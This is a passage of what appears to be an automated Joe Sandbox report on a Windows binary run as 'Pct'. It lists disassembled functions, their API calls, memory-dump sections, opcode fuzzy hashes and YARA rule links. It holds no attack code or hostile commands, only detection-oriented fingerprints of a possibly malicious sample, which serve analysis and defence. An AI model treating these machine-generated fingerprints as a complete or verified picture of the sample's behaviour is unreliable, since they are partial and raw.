                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 99fde103d9bdfe7023b43ce1277d38592a473ac7e1ace038edb8a2f3d918dbc4
                                                                                                                                                  • Instruction ID: 1734407a422e4118dd39f78fbf3da31f29939b57fce480aaa92c62a3ebdc9c8a
                                                                                                                                                  • Opcode Fuzzy Hash: 99fde103d9bdfe7023b43ce1277d38592a473ac7e1ace038edb8a2f3d918dbc4
                                                                                                                                                  • Instruction Fuzzy Hash: FEF138B06183019FC714DF28D481A6ABBE5FF88314F14896EF8AA9B351D730E945CF82
                                                                                                                                                  Function 00BD1680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                  • Opcode ID: 878c7cef8893cfe78411c248f8db58f6c13c9c77c8d183924653b1977c34f4f6
                                                                                                                                                  • Instruction ID: 9ce1fb8dee936a5efa9c6b5663cdd8ceb7c44f7cc3d53c0f380902bdb5696687
                                                                                                                                                  • Opcode Fuzzy Hash: 878c7cef8893cfe78411c248f8db58f6c13c9c77c8d183924653b1977c34f4f6
                                                                                                                                                  • Instruction Fuzzy Hash: CF619E71600209EBDF048F29D98166EBBF5FF44320F5585AAEC19CF2A5EB31D9A0CB51
                                                                                                                                                  Function 00BCAAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE07BB: MapVirtualKeyW.USER32(0000005B,00000000,?,?,?,00BCAB12), ref: 00BE07EC
                                                                                                                                                    • Part of subcall function 00BE07BB: MapVirtualKeyW.USER32(00000010,00000000,?,?,?,00BCAB12), ref: 00BE07F4
                                                                                                                                                    • Part of subcall function 00BE07BB: MapVirtualKeyW.USER32(000000A0,00000000,?,?,?,00BCAB12), ref: 00BE07FF
                                                                                                                                                    • Part of subcall function 00BE07BB: MapVirtualKeyW.USER32(000000A1,00000000,?,?,?,00BCAB12), ref: 00BE080A
                                                                                                                                                    • Part of subcall function 00BE07BB: MapVirtualKeyW.USER32(00000011,00000000,?,?,?,00BCAB12), ref: 00BE0812
                                                                                                                                                    • Part of subcall function 00BE07BB: MapVirtualKeyW.USER32(00000012,00000000,?,?,?,00BCAB12), ref: 00BE081A
                                                                                                                                                    • Part of subcall function 00BDFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BCAC6B), ref: 00BDFFA7
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BCAD08
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00BCAD85
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00C02F56
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1986988660-0
                                                                                                                                                  • Opcode ID: cff626be8bcd7291d42a21a99550f4c9871aa610037c67190548167aad871afb
                                                                                                                                                  • Instruction ID: 2dd05556876a3f6e5b9c6c7fb5e135580a803e28f73a4dffa0e245493a45cb82
                                                                                                                                                  • Opcode Fuzzy Hash: cff626be8bcd7291d42a21a99550f4c9871aa610037c67190548167aad871afb
                                                                                                                                                  • Instruction Fuzzy Hash: FE8198B09092408EC785EF69AD847197FE9EB9930833087AAE429C7272F774D444DF6D
                                                                                                                                                  Function 00BD59D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00BD59F9
                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?,FFFFFFFF,01702588,00C87A30), ref: 00BD5A9E
                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?,FFFFFFFF,01702588,00C87A30), ref: 00BD5ABB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconNotifyShell_$_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1505330794-0
                                                                                                                                                  • Opcode ID: 96ca941df919f1d5b85cce648245612ff6788a8f3ad6c319f9a078332f3e98b8
                                                                                                                                                  • Instruction ID: 35b7f83b4cdd121d4c404e6a2d4922476b4567a75047b679fc23a06542e2eabe
                                                                                                                                                  • Opcode Fuzzy Hash: 96ca941df919f1d5b85cce648245612ff6788a8f3ad6c319f9a078332f3e98b8
                                                                                                                                                  • Instruction Fuzzy Hash: 3D317AB0505711CFC720DF24D88479BBBE8EB49305F100A6EF59A82341E771A944CB96
                                                                                                                                                  Function 00BE593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00BE5953
                                                                                                                                                    • Part of subcall function 00BEA39B: __NMSG_WRITE.LIBCMT ref: 00BEA3C2
                                                                                                                                                    • Part of subcall function 00BEA39B: __NMSG_WRITE.LIBCMT ref: 00BEA3CC
                                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 00BE595A
                                                                                                                                                    • Part of subcall function 00BEA3F8: GetModuleFileNameW.KERNEL32(00000000,00C853BA,00000104,00000004,00000001,00BE1003), ref: 00BEA48A
                                                                                                                                                    • Part of subcall function 00BEA3F8: ___crtMessageBoxW.LIBCMT ref: 00BEA538
                                                                                                                                                    • Part of subcall function 00BE32CF: ___crtCorExitProcess.LIBCMT ref: 00BE32D5
                                                                                                                                                    • Part of subcall function 00BE32CF: ExitProcess.KERNEL32 ref: 00BE32DE
                                                                                                                                                    • Part of subcall function 00BE8D58: __getptd_noexit.LIBCMT ref: 00BE8D58
                                                                                                                                                  • HeapAlloc.KERNEL32(016E0000,00000000,00000001,?,00000004,?,?,00BE1003,?), ref: 00BE597F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess___crt$AllocFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2886449504-0
                                                                                                                                                  • Opcode ID: a64b9f59302b145f949950cbbc2c745ea8c1107b5d44dd5806e61b129eb6a40d
                                                                                                                                                  • Instruction ID: 22c1890d0413c7e8ee767511e78970d71f72982834b56c12a1062b0187bcb487
                                                                                                                                                  • Opcode Fuzzy Hash: a64b9f59302b145f949950cbbc2c745ea8c1107b5d44dd5806e61b129eb6a40d
                                                                                                                                                  • Instruction Fuzzy Hash: 9101D239201BC1DAE6212727AC42BAE32CCCF52775F5001AAF418AB292DFB09D004765
                                                                                                                                                  Function 6CC23060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CC23095
                                                                                                                                                    • Part of subcall function 6CC235A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CCAF688,00001000), ref: 6CC235D5
                                                                                                                                                    • Part of subcall function 6CC235A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC235E0
                                                                                                                                                    • Part of subcall function 6CC235A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CC235FD
                                                                                                                                                    • Part of subcall function 6CC235A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC2363F
                                                                                                                                                    • Part of subcall function 6CC235A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC2369F
                                                                                                                                                    • Part of subcall function 6CC235A0: __aulldiv.LIBCMT ref: 6CC236E4
                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC2309F
                                                                                                                                                    • Part of subcall function 6CC45B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC456EE,?,00000001), ref: 6CC45B85
                                                                                                                                                    • Part of subcall function 6CC45B50: EnterCriticalSection.KERNEL32(6CCAF688,?,?,?,6CC456EE,?,00000001), ref: 6CC45B90
                                                                                                                                                    • Part of subcall function 6CC45B50: LeaveCriticalSection.KERNEL32(6CCAF688,?,?,?,6CC456EE,?,00000001), ref: 6CC45BD8
                                                                                                                                                    • Part of subcall function 6CC45B50: GetTickCount64.KERNEL32(?,?,?,6CC456EE,?,00000001), ref: 6CC45BE4
                                                                                                                                                  • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CC230BE
                                                                                                                                                    • Part of subcall function 6CC230F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CC23127
                                                                                                                                                    • Part of subcall function 6CC230F0: __aulldiv.LIBCMT ref: 6CC23140
                                                                                                                                                    • Part of subcall function 6CC5AB2A: __onexit.LIBCMT ref: 6CC5AB30
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3830779025.000000006CC21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3830748804.000000006CC20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3830852669.000000006CCAE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3830875835.000000006CCB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_6cc20000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4291168024-0
                                                                                                                                                  • Opcode ID: 58887f45d4cc7a0a4fc86a24cd12d1cdc20f3e6c0855ebfa99c5666a1f1fb2b5
                                                                                                                                                  • Instruction ID: 5a9c8774d84f97b1cc1295034d764adcfd7641217aee7117d20f50894b58ed55
                                                                                                                                                  • Opcode Fuzzy Hash: 58887f45d4cc7a0a4fc86a24cd12d1cdc20f3e6c0855ebfa99c5666a1f1fb2b5
                                                                                                                                                  • Instruction Fuzzy Hash: 94F02D22E20B489BCB10DFB4A9451EEB774AF6B318F545319E89463531FF30A1E883D5
                                                                                                                                                  Function 00C292C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _free.LIBCMT ref: 00C292D6
                                                                                                                                                    • Part of subcall function 00BE2F85: HeapFree.KERNEL32(00000000,00000000,?,00BE9C54,00000000,00BE8D5D,00BE59C3), ref: 00BE2F99
                                                                                                                                                    • Part of subcall function 00BE2F85: GetLastError.KERNEL32(00000000,?,00BE9C54,00000000,00BE8D5D,00BE59C3), ref: 00BE2FAB
                                                                                                                                                  • _free.LIBCMT ref: 00C292E7
                                                                                                                                                  • _free.LIBCMT ref: 00C292F9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                  • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                                                                  • Instruction ID: 4828c083c929af29a88ce1a3298a07287e45866df69db10b2c2138731455d9a6
                                                                                                                                                  • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                                                                  • Instruction Fuzzy Hash: EFE0C2A120461293CA28A6397840E8377EC8F88312B14046DB419D3542CF30F84080B8
                                                                                                                                                  Function 00BC5E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: CALL
                                                                                                                                                  • API String ID: 0-4196123274
                                                                                                                                                  • Opcode ID: afde408ebc72dc9da0f725704ddd2d4df886312fb0fbf1ef619837ba23d5706f
                                                                                                                                                  • Instruction ID: b83fd49b799983badc954893f026b6661e73c4f8d3b15653e383984746514dcd
                                                                                                                                                  • Opcode Fuzzy Hash: afde408ebc72dc9da0f725704ddd2d4df886312fb0fbf1ef619837ba23d5706f
                                                                                                                                                  • Instruction Fuzzy Hash: 5B3224706082419FDB24DF14C494F2AB7E1FF84304F1589ADE99A9B362DB31ED85DB82
                                                                                                                                                  Function 00BD48B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID: EA06
                                                                                                                                                  • API String ID: 4104443479-3962188686
                                                                                                                                                  • Opcode ID: 5c2f88946c03453ffaaedeb9ccd5d2bc905ec428769e5dd426e08d72e4220544
                                                                                                                                                  • Instruction ID: 0803b0c748afc611be3bcce62c9202132941d51dfada8672f1ac603e1a8d99ca
                                                                                                                                                  • Opcode Fuzzy Hash: 5c2f88946c03453ffaaedeb9ccd5d2bc905ec428769e5dd426e08d72e4220544
                                                                                                                                                  • Instruction Fuzzy Hash: DB416B21A081585FDF219B5588A17BFFBE5CB46310F6840F7E882A7386E7748EC493E1
                                                                                                                                                  Function 00C3E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _strcat.LIBCMT ref: 00C3E20C
                                                                                                                                                    • Part of subcall function 00BC4D37: __itow.LIBCMT ref: 00BC4D62
                                                                                                                                                    • Part of subcall function 00BC4D37: __swprintf.LIBCMT ref: 00BC4DAC
                                                                                                                                                  • _wcscpy.LIBCMT ref: 00C3E29B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1012013722-0
                                                                                                                                                  • Opcode ID: 5115fa9f8aff5d870520c252248b67e5f3ac5e5c87ca38baee28d858104f53cd
                                                                                                                                                  • Instruction ID: 5f882da0aab846554e3ac7a7df8500aa2167ec32ef0b8a8463ddc161ed3d01ec
                                                                                                                                                  • Opcode Fuzzy Hash: 5115fa9f8aff5d870520c252248b67e5f3ac5e5c87ca38baee28d858104f53cd
                                                                                                                                                  • Instruction Fuzzy Hash: 2D912835A10605DFCB68DF19C5919ADB7E5EF49310B55809EE81A8F3A2DB30EE41CF81
                                                                                                                                                  Function 00C26818 Relevance: 3.2, APIs: 2, Instructions: 216COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memmove.LIBCMT ref: 00C268EC
                                                                                                                                                  • _memmove.LIBCMT ref: 00C2690A
                                                                                                                                                    • Part of subcall function 00C26A73: _memmove.LIBCMT ref: 00C26B01
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                  • Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                                                                                                  • Instruction ID: ec70a4412692036682b0a21f1d9bcad982f37cda05b49a6c3484ceea79129db1
                                                                                                                                                  • Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                                                                                                  • Instruction Fuzzy Hash: B771D570500224DFCB25AF18E445B6AB7A5EF44324F24C55CE8E66BA82CF31AE81DB70
                                                                                                                                                  Function 00C26135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00C2614E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharLower
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2358735015-0
                                                                                                                                                  • Opcode ID: 9f37d6318c1faf470b3faeb86b41d4454ca34bb9ac0db4378320ca55b2cf3ace
                                                                                                                                                  • Instruction ID: 0bb5262586a0ad00eae758e1c0735313c106d376e210a03b426960835c68d239
                                                                                                                                                  • Opcode Fuzzy Hash: 9f37d6318c1faf470b3faeb86b41d4454ca34bb9ac0db4378320ca55b2cf3ace
                                                                                                                                                  • Instruction Fuzzy Hash: CE41E5B6600219AFCB11EFA8D8819AEB3F8EF44350B10457EE516D7641EB70EE40CB60
                                                                                                                                                  Function 00BD5F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsThemeActive.UXTHEME ref: 00BD5FEF
                                                                                                                                                    • Part of subcall function 00BE359C: __lock.LIBCMT ref: 00BE35A2
                                                                                                                                                    • Part of subcall function 00BE359C: DecodePointer.KERNEL32(00000001,?,00BD6004,00C18892), ref: 00BE35AE
                                                                                                                                                    • Part of subcall function 00BE359C: EncodePointer.KERNEL32(?,?,00BD6004,00C18892), ref: 00BE35B9
                                                                                                                                                    • Part of subcall function 00BD5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BD5F18
                                                                                                                                                    • Part of subcall function 00BD5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BD5F2D
                                                                                                                                                    • Part of subcall function 00BD5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BD526C
                                                                                                                                                    • Part of subcall function 00BD5240: IsDebuggerPresent.KERNEL32 ref: 00BD527E
                                                                                                                                                    • Part of subcall function 00BD5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00BD52E6
                                                                                                                                                    • Part of subcall function 00BD5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00BD5366
                                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BD602F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1438897964-0
